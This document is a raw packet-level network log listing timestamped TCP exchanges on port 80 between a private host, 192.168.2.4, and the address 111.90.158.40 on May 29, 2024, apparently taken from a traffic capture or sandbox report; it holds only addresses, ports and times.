May 29, 2024 14:25:29.229511023 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.229528904 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.229581118 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.229593039 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.229602098 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.229626894 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.229628086 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.229672909 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.229679108 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.229871035 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.229882002 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.229891062 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.229901075 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.229916096 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.229940891 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.230679035 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.230695963 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.230717897 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.230748892 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.230760098 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.230784893 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.230803967 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.230830908 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.230842113 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.230842113 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.230953932 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.230963945 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.230973005 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.230984926 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.230993986 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.230993986 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.231009007 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.231014967 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.231020927 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.231034040 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.231044054 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.231048107 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.231074095 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.231101990 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.231112957 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.231122017 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.231133938 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.231139898 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.231143951 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.231153965 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.231161118 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.231164932 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.231188059 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.231206894 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.231451988 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.231501102 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.231512070 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.231519938 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.231544018 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.231568098 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.231574059 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.231583118 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.231599092 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.231611013 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.231618881 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.231620073 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.231631041 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.231652021 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.231672049 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.231762886 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.232147932 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232204914 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232215881 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232230902 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232242107 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232243061 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.232255936 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232268095 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232276917 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.232295990 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232300043 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.232307911 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232328892 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.232409954 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232425928 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232434988 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232445002 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232456923 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232458115 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.232466936 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232477903 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232486963 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.232495070 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.232515097 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232522964 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.232527971 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232561111 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232574940 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.232578993 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232589960 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232626915 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232635975 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.232636929 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232661963 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.232691050 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232702971 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232712030 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.232737064 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.232765913 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.316184044 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316201925 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316211939 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316221952 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316231012 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316241026 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316246986 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316251040 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316257000 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316274881 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.316308975 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.316313028 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316330910 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316342115 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316351891 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316353083 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.316364050 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316374063 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316385031 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.316385984 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316396952 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316406965 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316415071 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.316417933 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316430092 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316438913 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.316442013 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316452026 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.316469908 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.316591978 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316602945 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316612959 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316623926 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316641092 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.316668034 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316677094 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.316682100 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316719055 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.316939116 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316950083 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.316996098 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.317655087 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.317698002 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.317713022 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.317737103 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.317753077 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.317764997 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.317776918 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.317797899 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.317825079 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.377619982 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.377635956 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.377648115 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.377691984 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.377737045 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.507755995 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.507776976 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.507786989 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.507824898 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.507854939 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.507857084 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.507914066 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.507931948 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.507942915 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.507952929 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.507961988 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.507971048 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.507997990 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.508049965 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.508065939 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.508075953 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.508085966 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.508089066 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.508096933 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.508106947 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.508114100 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.508119106 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.508127928 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.508136988 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.508169889 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.508227110 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.508255959 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.508264065 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.508265972 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.508287907 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.508296967 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.508326054 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.508341074 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.508642912 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.508651972 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.508688927 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.508780003 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.508807898 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.508855104 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.508863926 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.508896112 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.509008884 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.509048939 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.509057045 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.509072065 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.509082079 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.509093046 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.509094954 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.509118080 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.509129047 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.509464979 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.509480953 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.509490013 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.509499073 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.509509087 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.509516001 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.509537935 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.509566069 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.509601116 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.509609938 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.509840965 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.509850025 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.509859085 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.509886026 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.509898901 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.509907007 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.509908915 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.509921074 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.509932041 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.509941101 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.509944916 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.509968996 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.510142088 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.510149956 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.510180950 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.510257959 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.510267019 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.510276079 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.510293961 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.510310888 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.510322094 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.510322094 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.510332108 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.510355949 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.510685921 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.510696888 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.510705948 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.510715008 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.510730982 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.510731936 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.510741949 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.510752916 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.510765076 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.510926962 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.510967016 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.510972023 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.511080980 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511090040 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511099100 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511107922 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511122942 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.511147976 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.511167049 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511176109 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511204958 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.511423111 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511605024 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511620045 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511631012 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511639118 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511641979 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.511650085 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511658907 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511661053 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.511670113 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511681080 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511684895 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.511687040 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511692047 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511696100 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511701107 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511704922 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.511706114 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511724949 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511738062 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511743069 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511750937 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511753082 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.511758089 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511780977 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.511781931 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511797905 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.511823893 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511832952 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511842966 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.511869907 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.511889935 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.511986017 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512002945 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512036085 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.512197018 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512207031 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512216091 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512223959 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512233019 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512243032 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512254000 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.512279034 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.512367964 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512393951 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512445927 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512478113 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512490988 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.512520075 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512546062 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.512554884 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512564898 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512595892 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.512639999 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512655020 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512664080 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512674093 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512675047 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.512686014 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512693882 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512702942 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.512703896 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512722969 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.512744904 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.512773991 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512797117 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512948036 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512957096 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512965918 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.512986898 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.512989044 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.513000965 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.513009071 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.513025999 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.513042927 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.513093948 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.513135910 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.513258934 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.513297081 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.513309956 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.513319016 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.513345003 CEST	49760	80	192.168.2.4	111.90.158.40
May 29, 2024 14:25:29.513418913 CEST	80	49760	111.90.158.40	192.168.2.4
May 29, 2024 14:25:29.513428926 CEST	80	49760	111.90.158.40	192.168.2.4
